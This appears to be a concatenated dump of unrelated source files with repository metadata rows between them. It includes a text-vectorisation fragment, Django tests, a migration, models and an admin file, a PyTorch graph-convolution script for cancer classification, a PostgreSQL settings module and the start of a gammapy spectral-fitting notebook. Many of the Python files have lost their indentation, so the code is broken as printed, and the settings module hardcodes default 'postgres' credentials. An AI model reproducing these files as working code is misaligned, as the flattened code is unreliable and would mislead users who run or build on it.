                                    class_num) # getUniqueVocabulary is slow, so its result is cached in a CSV
    # add further term weighting schemes here if needed
    feature.getBDCVector(voca_dict, class_num, "bdc") # compute BDC values from the vocabulary; an index name must be given
    #feature.getDFBDCVector(voca_dict, class_num, "df_bdc") # compute DF_BDC values from the vocabulary; an index name must be given
    feature.getTotalVoca(pd_test, voca_dict) # add the features that appear in the test set to the vocabulary
    if voca_csv: # write the vocabulary to file if a path was given
voca_dict.to_csv(voca_csv)
print(voca_dict)
return pd_train, pd_test, voca_dict
# convert the documents into vectors under a given term weighting scheme
def __generate_vector(pd_train,pd_test,voca_dict,feature_name,train_csv=None,test_csv=None):
    pd_train_copy = pd_train.copy() # copy to avoid mutating the caller's data
    pd_test_copy = pd_test.copy()
    # convert the training and test sets into vectors
tv.changeToFeatureVector(pd_train_copy, voca_dict, feature_name)
tv.changeToFeatureVector(pd_test_copy, voca_dict, feature_name)
    if train_csv:
        pd_train_copy.to_csv(train_csv) # write the training file
    if test_csv:
        pd_test_copy.to_csv(test_csv) # write the test file
# data processing for the multi-class task
def multi_class_data():
    class_num = 20 # number of classes in the multi-class task
    pd_train, pd_test,voca_dict = __voca_dict(class_num, voca_csv=path.VOCA_MULTI_CSV) # build the multi-class vocabulary
__generate_vector(pd_train, pd_test, voca_dict,"bdc", train_csv=path.TRAIN_MULTI_BDC_CSV, test_csv=path.TEST_MULTI_BDC_CSV)
#__generate_vector(pd_train, pd_test, voca_dict,"df_bdc", train_csv=path.TRAIN_MULTI_DF_BDC_CSV, test_csv=path.TEST_MULTI_DF_BDC_CSV)
# data processing for the binary task
def binary_class_data():
    class_num = 2 # number of classes in the binary task
    pd_train, pd_test,voca_dict = __voca_dict(class_num, voca_csv=path.VOCA_BINARY_CSV) # build the vocabulary for the binary task
    # relabel the binary classes according to the designated positive class
def f(x):
if x[CONFIRM_POS_CLASS] == 1:
return [1, 0]
else:
return [0, 1]
pd_train['class'] = pd_train['class'].apply(f)
pd_test['class'] = pd_test['class'].apply(f)
__generate_vector(pd_train, pd_test, voca_dict,"bdc", train_csv=path.TRAIN_BINARY_BDC_CSV, test_csv=path.TEST_BINARY_BDC_CSV)
__generate_vector(pd_train, pd_test, voca_dict,"df_bdc", train_csv=path.TRAIN_BINARY_DF_BDC_CSV, test_csv=path.TEST_BINARY_DF_BDC_CSV)
if __name__ == '__main__':
multi_class_data()
#binary_class_data()
|
[
"chauncyzhu@163.com"
] |
chauncyzhu@163.com
|
bf38c9ba21a9178526560f3d4d833892fc472830
|
4ac6645c5925feefc8a3ab8587d08edc6edb220e
|
/school/unit/tests/test_api.py
|
0abf5166aa3e74b405609fa0d4013d54c6ac092d
|
[
"MIT"
] |
permissive
|
yucealiosman/school
|
4a4b701a8ef87fc15b637e655f4d995a0b243adf
|
630059760f411c163db57f980b780d8501aa1a6d
|
refs/heads/main
| 2023-09-04T05:25:36.278730
| 2021-03-19T12:28:33
| 2021-03-19T15:05:17
| 349,236,587
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,007
|
py
|
import json
from unittest.mock import patch
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase, APIClient
from school.unit import models
from school.unit.tests import factories
from school.unit.tests.factories import SuperUserFactory
class BaseTest(APITestCase):
def setUp(self):
self.client = APIClient()
self.client.force_authenticate(user=SuperUserFactory())
class StudentApiTest(BaseTest):
def test_student_list(self):
student_count = 5
teacher = factories.TeacherFactory()
class_room = factories.ClassRoomFactory(teachers=[teacher])
student_list = factories.StudentFactory.create_batch(
class_room=class_room, size=student_count)
expected_student_pk_set = {str(student.pk) for student in
student_list}
response = self.client.get(reverse('students-list'))
data = response.json()
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(data['count'], student_count)
student_pk_set_from_resp = {student["pk"] for student in
data["results"]}
self.assertEqual(expected_student_pk_set, student_pk_set_from_resp)
def test_student_detail(self):
teacher = factories.TeacherFactory()
class_room = factories.ClassRoomFactory(teachers=[teacher])
student = factories.StudentFactory(class_room=class_room)
response = self.client.get(
reverse('students-detail', kwargs={'pk': str(student.pk)}))
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
data = response.json()
self.assertEqual(class_room.code, data["class_room"]["code"])
teacher_pk_list_from_resp = [teacher["pk"] for teacher in
data["class_room"]["teachers"]]
self.assertEqual(teacher_pk_list_from_resp, [str(teacher.pk)])
class HomeWorkApiTest(BaseTest):
@patch('school.unit.services.HomeWorkService.notify')
def test_create_homework(self, notify_mock):
teacher = factories.TeacherFactory()
class_room = factories.ClassRoomFactory(teachers=[teacher])
hw_not_created = factories.ClassHomeWorkFactory.build()
data = {
'title': hw_not_created.title,
'description': hw_not_created.description,
'class_room': str(class_room.pk)
}
response = self.client.post(
reverse('homeworks-by-teacher-list',
kwargs={'teacher__pk': str(teacher.pk)}),
data=json.dumps(data),
content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
data = response.json()
hw_created = models.ClassHomeWork.objects.get(pk=data["pk"])
self.assertEqual(data["title"], hw_not_created.title)
self.assertEqual(data["description"], hw_not_created.description)
self.assertEqual(data["teacher"], str(teacher.pk))
self.assertEqual(data["class_room"], str(class_room.pk))
notify_mock.assert_called_once_with(hw_created, 'created')
@patch('school.unit.services.HomeWorkService.notify')
def test_update_homework(self, notify_mock):
teacher = factories.TeacherFactory()
class_room = factories.ClassRoomFactory(teachers=[teacher])
homework = factories.ClassHomeWorkFactory(class_room=class_room,
teacher=teacher)
new_description = "New HomeWork description"
update_data = {
'description': new_description
}
response = self.client.patch(
reverse('homeworks-by-teacher-detail',
kwargs={'teacher__pk': str(teacher.pk),
'pk': str(homework.pk)}),
data=json.dumps(update_data),
content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
data = response.json()
self.assertEqual(data["description"], new_description)
notify_mock.assert_called_once_with(homework, 'updated')
@patch('school.unit.services.HomeWorkService.notify')
def test_delete_homework(self, notify_mock):
homework = factories.ClassHomeWorkFactory()
response = self.client.delete(
reverse('homeworks-by-teacher-detail',
kwargs={'teacher__pk': str(homework.teacher.pk),
'pk': str(homework.pk)}))
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT,
response.data)
self.assertFalse(
models.ClassHomeWork.objects.filter(pk=homework.pk).exists())
notify_mock.assert_called_once()
|
[
"aliosmanyuce@gmail"
] |
aliosmanyuce@gmail
|
025e7c2fd0563d6420b77dde0117743c67a0e7a4
|
1578ce4b2961a0b89b7fac47e9063acaced21b4c
|
/address/migrations/0002_address_customer.py
|
279c38da990f0df58c68a7d18957b0fcedd9135e
|
[] |
no_license
|
mrpyrex/epytech
|
8125c50b7274ec8511d0677f33b0569ebc5472b5
|
e511cdecc8b554f65ed135b9ac6d312c278fc873
|
refs/heads/master
| 2020-07-20T10:40:17.001431
| 2019-09-11T20:38:42
| 2019-09-11T20:38:42
| 206,624,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
# Generated by Django 2.1.7 on 2019-09-04 07:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('address', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='address',
name='customer',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
|
[
"ndifrkeumoren@gmail.com"
] |
ndifrkeumoren@gmail.com
|
0c081fd0cf2dee0806a9c57bd30da55b4a4b8187
|
6c4faabeddafecdbe11d1f8250dbff620e03fa07
|
/listings/models.py
|
1339df6f0d4266275c5abe1b27349a86d9834151
|
[] |
no_license
|
donnyboi/btre
|
20565e7c1a6411c808b38a72645a96c0d3196b44
|
174671348e680241a9af50b379595fc817596488
|
refs/heads/master
| 2020-11-26T05:08:01.996657
| 2020-03-19T07:50:13
| 2020-03-19T07:50:13
| 228,972,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,508
|
py
|
from django.db import models
from datetime import datetime
from realtors.models import Realtor
# Create your models here.
class Listing(models.Model):
realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
title = models.CharField(max_length=200)
address = models.CharField(max_length=200)
city = models.CharField(max_length=100)
state = models.CharField(max_length=100)
zipcode = models.CharField(max_length=20)
description = models.TextField(blank=True)
price = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
garage = models.IntegerField(default=0)
sqft = models.IntegerField()
lot_size = models.DecimalField(max_digits=5, decimal_places=1)
photo_main = models.ImageField(upload_to='photos/%Y/%m/%d/')
photo_1 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_2 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_3 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_4 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_5 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
photo_6 = models.ImageField(upload_to='photos/%Y/%m/%d/', blank=True)
is_published = models.BooleanField(default=True)
list_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.title
|
[
"diresher@gmail.com"
] |
diresher@gmail.com
|
74c0f20f27a5b7bcad076b8a5b964d41878080ab
|
0a6b07635bfe1cda46fb9a537c3f5974c091f89a
|
/ExprGCNPPI.py
|
ec9a99c34d0d184b7f45fec3b1df86c652ecaa91
|
[] |
no_license
|
sabdollahi/WinBinVec
|
89096b48612a1efa24c4f9ea63f27cdc185059b4
|
5b4b2e7f0e9d97eccc9d558449d4dfaf36d53da3
|
refs/heads/main
| 2023-07-11T05:24:05.141008
| 2021-08-25T09:50:12
| 2021-08-25T09:50:12
| 309,229,996
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,400
|
py
|
from __future__ import division
from __future__ import print_function
import time
import argparse
import numpy as np
import torch
import torch.nn.functional as F
import torch.optim as optim
import math
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
import numpy as np
import seaborn as sns
from sklearn.metrics import roc_curve, auc
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import roc_auc_score
import os
import pickle
from sklearn.model_selection import KFold
from torch.autograd import Variable
from sklearn.utils import shuffle
#"GraphConvolution" and "GCN" classes are obtained from the following GitHub repository
#https://github.com/tkipf/pygcn
class GraphConvolution(Module):
def __init__(self, in_features, out_features, bias=True):
super(GraphConvolution, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.FloatTensor(in_features, out_features))
if bias:
self.bias = Parameter(torch.FloatTensor(out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
stdv = 1. / math.sqrt(self.weight.size(1))
self.weight.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
def forward(self, input, adj):
support = torch.mm(input, self.weight)
output = torch.spmm(adj, support)
if self.bias is not None:
return output + self.bias
else:
return output
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
class GCN(nn.Module):
def __init__(self, nfeat, nhid, nclass, dropout):
super(GCN, self).__init__()
self.gc1 = GraphConvolution(nfeat, nhid)
self.gc2 = GraphConvolution(nhid, nclass)
self.dropout = dropout
def forward(self, x, adj):
x = F.relu(self.gc1(x, adj))
x = F.dropout(x, self.dropout, training=self.training)
x = self.gc2(x, adj)
return F.log_softmax(x, dim=1)
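# Usage sketch (an added illustration, not from the original script): exercise
# the GCN above on a toy 4-node graph with one scalar feature per node. The
# sizes and the identity adjacency matrix are assumptions for demonstration.
def _gcn_demo():
    toy_adj = torch.eye(4)          # stand-in for a normalized adjacency matrix
    toy_x = torch.rand(4, 1)        # one expression-like feature per node
    toy_gcn = GCN(nfeat=1, nhid=8, nclass=2, dropout=0.5)
    return toy_gcn(toy_x, toy_adj)  # log-probabilities with shape (4, 2)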
#ExprGCNPPI implemented by Sina Abdollahi for WinBinVec paper
class ExprGCNPPI(nn.Module):
def __init__(self):
super(ExprGCNPPI, self).__init__()
self.gcn = GCN(nfeat=1, nhid=8, nclass=1, dropout=0.5)
        #626: The number of partner proteins involved in the PPIs
self.fc1 = nn.Linear(572, 256)
self.fc2 = nn.Linear(256, 8)
self.fc3 = nn.Linear(8, 2)
self.bn1 = nn.BatchNorm1d(num_features=256)
self.drop1 = torch.nn.Dropout(0.4)
self.bn2 = nn.BatchNorm1d(num_features=8)
self.drop2 = torch.nn.Dropout(0.4)
def forward(self, adj, expr, batch_size):
outs = []
for i in range(batch_size):
outs.append(self.gcn(expr[i,:], adj[i,:]).view(1,adj.size(1)))
concat_gcn = outs[0]
for i in range(1,batch_size):
concat_gcn = torch.cat([concat_gcn, outs[i]], dim=0)
output = self.drop1(F.relu(self.bn1(self.fc1(concat_gcn))))
output = self.drop2(F.relu(self.bn2(self.fc2(output))))
output = self.fc3(output)
return output
ppi_adj_matrix = pickle.load(open("DATASET/Adj.pickle", "rb"))
#adj -> Adjacency matrix (N by N ---> N is the number of nodes)
#expr -> Features (Expression) matrix (N by 1 ---> 1 is for gene expression value for each protein)
tcga_clinical_dataframe = pickle.load(open("DATASET/TCGA_clinical_dataframe.pickle","rb"))
classes = {"adrenal gland":0, "bladder":1, "breast":2, "GYN":3, "bile duct":4, "CRC":5, "bone marrow":6, "esophagus":7, "brain":8, "head and neck":9, "Kidney":10, "liver":11, "Lung":12, "pleura":13, "pancreatic":14, "male reproductive system":15, "other":16, "Melanoma":17, "stomach":18, "thyroid":19, "thymus":20}
which_clinicals = ['cancer_class']
tcga_clinical_dataframe = tcga_clinical_dataframe[which_clinicals]
for cancer_class in classes:
print(">>>>>>" + cancer_class)
folds_accuracy = []
folds_roc_auc = []
folds_PR_auc = []
replace_statement = {}
for cl in classes:
if(cl != cancer_class):
replace_statement[cl] = 0
else:
replace_statement[cl] = 1
specific_cancer_patients = tcga_clinical_dataframe[tcga_clinical_dataframe["cancer_class"] == cancer_class]
specific_cancer_patients = specific_cancer_patients.replace({'cancer_class': replace_statement})
other_cancer_patients = tcga_clinical_dataframe[tcga_clinical_dataframe["cancer_class"] != cancer_class]
other_cancer_patients = shuffle(other_cancer_patients).sample(n = len(specific_cancer_patients))
other_cancer_patients = other_cancer_patients.replace({'cancer_class': replace_statement})
K = 10 #Kfold (number of parts = K)
kf_other = KFold(n_splits = K, shuffle = True)
kf_specific = KFold(n_splits = K, shuffle = True)
parts_specific = kf_specific.split(specific_cancer_patients)
parts_other = kf_other.split(other_cancer_patients)
indices_specific = next(parts_specific, None)
indices_other = next(parts_other, None)
fold = 1
while(indices_specific):
#Define the model
model = ExprGCNPPI()
        # Cross-Entropy Loss
criterion = torch.nn.CrossEntropyLoss()
# Stochastic Gradient Descent
optimizer = torch.optim.SGD(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1.0, gamma=0.95)
batch_size = 20
print("Shuffled Epoch (20): ", end="")
for shuffled_epoch in range(20):
if(shuffled_epoch == 19):
print((shuffled_epoch+1))
else:
print((shuffled_epoch+1), end=", ")
training = specific_cancer_patients.iloc[indices_specific[0]]
training_other = other_cancer_patients.iloc[indices_other[0]]
training = shuffle(training.append(training_other))
Y = training[['cancer_class']].values
Y = Variable(torch.LongTensor(Y.flatten()), requires_grad=False)
training = training.index
for epoch in range(50):
for index in range(0, len(training), batch_size):
y = Y[index : index + batch_size]
batch_X = []
kk = 0
for patient in training[index : index + batch_size]:
kk += 1
p_data = pickle.load(open("DATASET/ExpressionInputs/" + patient + "_expressions.pickle", "rb"))
batch_X.append(p_data)
X = np.asarray(batch_X)
adj = np.array([ppi_adj_matrix]*batch_size)
adj = adj.astype(np.float32)
adj = torch.FloatTensor(adj)
X = X.astype(np.float32)
X = torch.FloatTensor(X)
X = X.view(X.size(0), X.size(1), 1)
optimizer.zero_grad()
Y_hat = model(adj, X, kk)
loss = criterion(Y_hat, y)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)
optimizer.step()
test = specific_cancer_patients.iloc[indices_specific[1]]
test_other = other_cancer_patients.iloc[indices_other[1]]
test = shuffle(test.append(test_other))
Y_test = test[['cancer_class']].values
Y_test = Variable(torch.LongTensor(Y_test.flatten()), requires_grad=False)
test = test.index
avg_acc = 0
isFirstTime = True
output_predicted = ""
ii = 0
        for index in range(0, len(test), batch_size):
y = Y_test[index : index + batch_size]
test_list = []
kk = 0
for patient in test[index : index + batch_size]:
kk += 1
p_data = pickle.load(open("DATASET/ExpressionInputs/" + patient + "_expressions.pickle", "rb"))
test_list.append(p_data)
#test_list = torch.FloatTensor(test_list)
if(len(test_list) <= 1):
break
X_test = np.asarray(test_list)
adj = np.array([ppi_adj_matrix]*batch_size)
adj = adj.astype(np.float32)
adj = torch.FloatTensor(adj)
X_test = X_test.astype(np.float32)
X_test = torch.FloatTensor(X_test)
X_test = X_test.view(X_test.size(0), X_test.size(1), 1)
test_batch_Y_hat = model.forward(adj, X_test, kk)
if(isFirstTime):
output_predicted = test_batch_Y_hat
isFirstTime = False
else:
output_predicted = torch.cat((output_predicted, test_batch_Y_hat), 0)
dummy, preds_test = torch.max (test_batch_Y_hat, dim = 1)
accuracy_test = (preds_test == y).long().sum().float() / preds_test.size()[0]
avg_acc += accuracy_test
ii += 1
avg_acc = avg_acc / ii
Y_prediction = torch.softmax(output_predicted, dim=1)
Y_prediction = np.array(Y_prediction.tolist())
Y_real = np.array([[1,0] if y == 0 else [0,1] for y in Y_test])
fpr = dict()
tpr = dict()
precision = dict()
recall = dict()
roc_auc = dict()
PR_auc = dict()
for i in range(2):
fpr[i], tpr[i], _ = roc_curve(Y_real[:, i], Y_prediction[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
precision[i], recall[i], _ = precision_recall_curve(Y_real[:, i], Y_prediction[:, i])
PR_auc[i] = auc(recall[i], precision[i])
print("Fold " + str(fold) + " Accuracy: " + str(avg_acc))
print("Fold " + str(fold) + " ROC AUC: " + str(roc_auc[1]))
print("Fold " + str(fold) + " PR AUC: " + str(PR_auc[1]))
fold += 1
folds_accuracy.append(avg_acc)
folds_roc_auc.append(roc_auc[1])
folds_PR_auc.append(PR_auc[1])
indices_specific = next(parts_specific, None)
indices_other = next(parts_other, None)
if not os.path.exists('RESULTS/ExprGCNPPIResults'):
os.makedirs('RESULTS/ExprGCNPPIResults')
pickle.dump(folds_accuracy, open("RESULTS/ExprGCNPPIResults/" + cancer_class + "_Accuracy.pickle","wb"))
pickle.dump(folds_roc_auc, open("RESULTS/ExprGCNPPIResults/" + cancer_class + "_ROC_AUC.pickle","wb"))
pickle.dump(folds_PR_auc, open("RESULTS/ExprGCNPPIResults/" + cancer_class + "_PR_AUC.pickle","wb"))
#Predict Metastasis (Stage IV) or not (Stages I, II, and III)
#tcga_clinical_dataframe[tcga_clinical_dataframe['stage'] == 'Stage IVA']
tcga_clinical_dataframe = pickle.load(open("DATASET/TCGA_clinical_dataframe.pickle","rb"))
which_clinicals = ['stage']
tcga_clinical_dataframe = tcga_clinical_dataframe[which_clinicals]
replace_statement = {}
metastasis_list = ['Stage IV','Stage IVA','Stage IVB','Stage IVC']
other_list = ['Stage I','Stage IA','Stage IB','Stage II','Stage IIA','Stage IIB','Stage IIC','Stage III','Stage IIIA','Stage IIIB','Stage IIIC']
#Metastasis Stage
for m in metastasis_list:
replace_statement[m] = 1
#Non-metastasis Stage
for o in other_list:
replace_statement[o] = 0
metastasis_patients = tcga_clinical_dataframe[tcga_clinical_dataframe["stage"].isin(metastasis_list)]
metastasis_patients = metastasis_patients.replace({'stage': replace_statement})
other_patients = tcga_clinical_dataframe[tcga_clinical_dataframe["stage"].isin(other_list)]
other_patients = other_patients.replace({'stage': replace_statement})
start_and_end_for_other = [0,793,1586,2379,3172,3965,4758,5554]
for i in range(7):
print("PART: " + str(i))
selected_other_patients = other_patients[start_and_end_for_other[i]:start_and_end_for_other[i+1]]
folds_accuracy = []
K = 10 #Kfold (number of parts = K)
kf_other = KFold(n_splits = K, shuffle = True)
kf_metastasis = KFold(n_splits = K, shuffle = True)
parts_metastasis = kf_metastasis.split(metastasis_patients)
parts_other = kf_other.split(selected_other_patients)
indices_metastasis = next(parts_metastasis, None)
indices_other = next(parts_other, None)
fold_number = 1
while(indices_metastasis):
model = ExprGCNPPI()
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1.0, gamma=0.95)
batch_size = 20
print("Shuffled Epoch (20): ", end="")
for shuffled_epoch in range(20):
if(shuffled_epoch == 19):
print((shuffled_epoch+1))
else:
print((shuffled_epoch+1), end=", ")
training = metastasis_patients.iloc[indices_metastasis[0]]
training_other = selected_other_patients.iloc[indices_other[0]]
training = shuffle(training.append(training_other))
Y = training[['stage']].values
Y = Variable(torch.LongTensor(Y.flatten()), requires_grad=False)
training = training.index
for epoch in range(50):
for index in range(0, len(training), batch_size):
y = Y[index : index + batch_size]
batch_X = []
kk = 0
for patient in training[index : index + batch_size]:
kk += 1
p_data = pickle.load(open("DATASET/ExpressionInputs/" + patient + "_expressions.pickle", "rb"))
batch_X.append(p_data)
X = np.asarray(batch_X)
adj = np.array([ppi_adj_matrix]*batch_size)
adj = adj.astype(np.float32)
adj = torch.FloatTensor(adj)
X = X.astype(np.float32)
X = torch.FloatTensor(X)
X = X.view(X.size(0), X.size(1), 1)
optimizer.zero_grad()
Y_hat = model(adj, X, kk)
loss = criterion(Y_hat, y)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)
optimizer.step()
test = metastasis_patients.iloc[indices_metastasis[1]]
test_other = selected_other_patients.iloc[indices_other[1]]
test = shuffle(test.append(test_other))
Y_test = test[['stage']].values
Y_test = Variable(torch.LongTensor(Y_test.flatten()), requires_grad=False)
test = test.index
avg_acc = 0
ii = 0
        for index in range(0, len(test), batch_size):
y = Y_test[index : index + batch_size]
test_list = []
kk = 0
for patient in test[index : index + batch_size]:
kk += 1
p_data = pickle.load(open("DATASET/ExpressionInputs/" + patient + "_expressions.pickle", "rb"))
test_list.append(p_data)
if(len(test_list) <= 1):
break
X_test = np.asarray(test_list)
adj = np.array([ppi_adj_matrix]*batch_size)
adj = adj.astype(np.float32)
adj = torch.FloatTensor(adj)
X_test = X_test.astype(np.float32)
X_test = torch.FloatTensor(X_test)
X_test = X_test.view(X_test.size(0), X_test.size(1), 1)
test_batch_Y_hat = model.forward(adj, X_test, kk)
dummy, preds_test = torch.max (test_batch_Y_hat, dim = 1)
accuracy_test = (preds_test == y).long().sum().float() / preds_test.size()[0]
avg_acc += accuracy_test
ii += 1
avg_acc = avg_acc / ii
print("Fold: " + str(fold_number) + " ACC: " + str(avg_acc))
fold_number += 1
folds_accuracy.append(avg_acc)
indices_metastasis = next(parts_metastasis, None)
indices_other = next(parts_other, None)
if not os.path.exists('RESULTS/ExprGCNPPI-StagePrediction'):
os.makedirs('RESULTS/ExprGCNPPI-StagePrediction')
pickle.dump(folds_accuracy, open("RESULTS/ExprGCNPPI-StagePrediction/Part" + str(i) + "_folds_accuracy.pickle","wb"))
|
[
"noreply@github.com"
] |
sabdollahi.noreply@github.com
|
2261ff42ef53ff6f7e29b4575773ca2548c73283
|
bf348f0a5dbde6052f0cf6e4c9e570bd07c13533
|
/src/ManageDatabases/SettingDatabase.py
|
ef2a44a44127f3c18a555bccf54ff38bc30b8f18
|
[] |
no_license
|
PaoloGraziani/webAppFlask
|
7b114c59108bdfff9d9f768325c3ebcf3b3b90f0
|
7808c276645215f121def4850ada251f708d41ee
|
refs/heads/main
| 2023-07-25T01:33:20.566515
| 2021-09-09T17:28:27
| 2021-09-09T17:28:27
| 383,222,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
import psycopg2
'''
Authentication database configuration
'''
Authentication_HOST = "localhost"
Authentication_DATABASE = "AuthDATA"
Authentication_USERNAME = "postgres"
Authentication_PASSWORD = "postgres"
'''
Application database configuration
'''
Application_HOST = "localhost"
Application_DATABASE = "DbWebApp"
Application_USERNAME = "postgres"
Application_PASSWORD = "postgres"
def closeCursor(cur):
cur.close()
def connectDatabase(host, database, username, password):
newConnection = psycopg2.connect(host=host, database=database, user=username, password=password)
return newConnection
def closeConnection(conn):
conn.close()
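# Usage sketch (an added illustration, not part of the original module): open a
# connection to the application database, run a trivial query, and clean up.
# The "SELECT 1" statement is a placeholder; real queries are app-specific.
def demoQuery():
    conn = connectDatabase(Application_HOST, Application_DATABASE,
                           Application_USERNAME, Application_PASSWORD)
    cur = conn.cursor()
    cur.execute("SELECT 1")
    result = cur.fetchone()
    closeCursor(cur)
    closeConnection(conn)
    return result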
|
[
"paolo.graziani@studenti.univr.it"
] |
paolo.graziani@studenti.univr.it
|
77d1a721f114372350581d34c782000e12e28616
|
3806175fcbc4a386bea986dfb97a362fb983862f
|
/blog/admin.py
|
b067606aa8033d6bc2cc3041330821fe31e22b76
|
[] |
no_license
|
Kiki-demo/MyBlog
|
c53cbcbae1b3280da74d1d349ff6cc717a79b332
|
51554c92ac5435a7bc2222deedf7aa397c0bd73a
|
refs/heads/master
| 2023-03-28T06:08:10.164174
| 2019-08-02T10:25:20
| 2019-08-02T10:25:20
| 199,954,653
| 0
| 0
| null | 2021-03-29T20:10:39
| 2019-08-01T01:34:14
|
CSS
|
GB18030
|
Python
| false
| false
| 441
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
# Register your models here.
from .models import Category, Tag, Post
class PostAdmin(admin.ModelAdmin):
list_display = ['title', 'created_time', 'modified_time', 'category', 'author']
# Register the newly added PostAdmin as well
admin.site.register(Post, PostAdmin)
admin.site.register(Category)
admin.site.register(Tag)
|
[
"kiki.zhang@dewav.com"
] |
kiki.zhang@dewav.com
|
a4d250d72f94be4c124927e70b0c139ad9f85f9d
|
f8fbf0b0cc919d7d4d7c79532cc5434552d75eb8
|
/docs/0.18.1/_static/notebooks/modeling.py
|
a5bdb272476813045d22aca2f06eddfb47942841
|
[] |
no_license
|
adonath/gammapy-docs
|
ae8571c6aa76d231ac54c93fb3c8968f9f79993b
|
32b605d623abdcd2e82c30bcbf07ef30d259783a
|
refs/heads/main
| 2023-02-25T05:24:53.211005
| 2022-10-13T00:09:12
| 2022-10-13T00:11:33
| 550,476,516
| 0
| 0
| null | 2022-10-12T20:45:50
| 2022-10-12T20:45:49
| null |
UTF-8
|
Python
| false
| false
| 14,807
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Modeling and fitting
#
#
# ## Prerequisites
#
# - Knowledge of spectral analysis to produce 1D On-Off datasets, [see the following tutorial](spectrum_analysis.ipynb)
# - Reading of pre-computed datasets [see the MWL tutorial](analysis_mwl.ipynb)
# - General knowledge on statistics and optimization methods
#
# ## Proposed approach
#
# This is a hands-on tutorial to `~gammapy.modeling`, showing how the model, dataset and fit classes work together. As an example we are going to work with HESS data of the Crab Nebula and show in particular how to :
# - perform a spectral analysis
# - use different fitting backends
# - access covariance matrix information and parameter errors
# - compute likelihood profile
# - compute confidence contours
#
# See also: [Models gallery tutorial](models.ipynb) and `docs/modeling/index.rst`.
#
#
# ## The setup
# In[ ]:
import numpy as np
from astropy import units as u
import matplotlib.pyplot as plt
import scipy.stats as st
from gammapy.modeling import Fit
from gammapy.datasets import Datasets, SpectrumDatasetOnOff
from gammapy.modeling.models import LogParabolaSpectralModel, SkyModel
from gammapy.visualization.utils import plot_contour_line
from itertools import combinations
# ## Model and dataset
#
# First we define the source model, here we need only a spectral model for which we choose a log-parabola
# In[ ]:
crab_spectrum = LogParabolaSpectralModel(
amplitude=1e-11 / u.cm ** 2 / u.s / u.TeV,
reference=1 * u.TeV,
alpha=2.3,
beta=0.2,
)
crab_spectrum.alpha.max = 3
crab_spectrum.alpha.min = 1
crab_model = SkyModel(spectral_model=crab_spectrum, name="crab")
# The data and background are read from pre-computed ON/OFF datasets of HESS observations, for simplicity we stack them together.
# Then we set the model and fit range to the resulting dataset.
# In[ ]:
datasets = []
for obs_id in [23523, 23526]:
dataset = SpectrumDatasetOnOff.from_ogip_files(
f"$GAMMAPY_DATA/joint-crab/spectra/hess/pha_obs{obs_id}.fits"
)
datasets.append(dataset)
dataset_hess = Datasets(datasets).stack_reduce(name="HESS")
# Set model and fit range
dataset_hess.models = crab_model
e_min = 0.66 * u.TeV
e_max = 30 * u.TeV
dataset_hess.mask_fit = dataset_hess.counts.geom.energy_mask(e_min, e_max)
# ## Fitting options
#
#
#
# First let's create a `Fit` instance:
# In[ ]:
fit = Fit([dataset_hess], store_trace=True)
# By default the fit is performed using MINUIT; you can select alternative optimizers and set their options using the `optimize_opts` argument of the `Fit.run()` method. In addition we have specified to store the trace of parameter values of the fit.
#
# Note that, for now, the covariance matrix and errors are computed only when fitting with MINUIT. However, depending on the problem, other optimizers can perform better, so it can sometimes be useful to run a pre-fit with alternative optimization methods.
#
# For the "scipy" backend the available options are described in detail here:
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html
# In[ ]:
get_ipython().run_cell_magic('time', '', 'scipy_opts = {"method": "L-BFGS-B", "options": {"ftol": 1e-4, "gtol": 1e-05}}\nresult_scipy = fit.run(backend="scipy", optimize_opts=scipy_opts)')
# For the "sherpa" backend you can choose the optimization algorithm between method = {"simplex", "levmar", "moncar", "gridsearch"}.
# Those methods are described and compared in detail on http://cxc.cfa.harvard.edu/sherpa/methods/index.html.
